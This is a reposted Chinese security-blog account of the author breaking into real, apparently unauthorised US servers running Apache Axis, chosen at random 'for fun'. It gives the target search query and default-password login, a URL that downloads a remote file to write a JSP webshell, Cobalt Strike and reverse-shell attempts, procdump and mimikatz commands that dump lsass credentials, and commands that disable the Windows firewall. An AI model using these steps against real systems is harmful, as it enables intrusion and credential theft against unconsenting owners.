日常摸鱼,无聊,想搞几台机器玩一玩,在网上找目标,找老外的机器下手
目标
country="US" && app="APACHE-Axis"
目标出现
还是熟悉的页面,熟悉的端口,然后尝试默认口令登录,ok, 这下稳了
先搜集一下信息
不要上来就部署包,先看一下现有的服务,像这种弱口令的基本上99.9999%都已经被人搞过了
再上传包就多此一举了,可以直接利用,找了一圈没发现遗留的马儿,找绝对路径自己上传
C:/elocker/webapps/admin/WEB-INF/classes
顺手一测,竟然可以出网,也不需要传shell了,直接掏出cs
执行命令
反弹shell
难道是因为在url里执行,导致powershell命令没有执行成功吗?带着这个疑问 反弹shell尝试一下
写入shell
x.x.x.x:8080/services/config/download?url=http://x.x.x.x/dama.txt&path=C:\elocker\webapps\admin\axis2-web\shell.jsp
绕过杀软
通过测试发现,最基本的net user也执行不了,摆在面前的路只有2条,果断选择抓密码,简单有效,mimikatz不免杀不可直接用。
做免杀
抓密码
这里我利用procdump把lsass进程的内存文件导出本地,再在本地利用mimikatz读取密码,上传procdump64.exe并下载lsass.dmp
# 导出为lsass.dump文件
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
# 把lsass.dmp放在mimikatz目录利用
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
登录服务器
查看防火墙状态
Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off
登录云桌面,发现意外惊喜
文章来源:先知社区(newlifes)
原文地址:https://xz.aliyun.com/t/9856
关 注 有 礼
还在等什么?赶紧点击下方名片关注学习吧!
推 荐 阅 读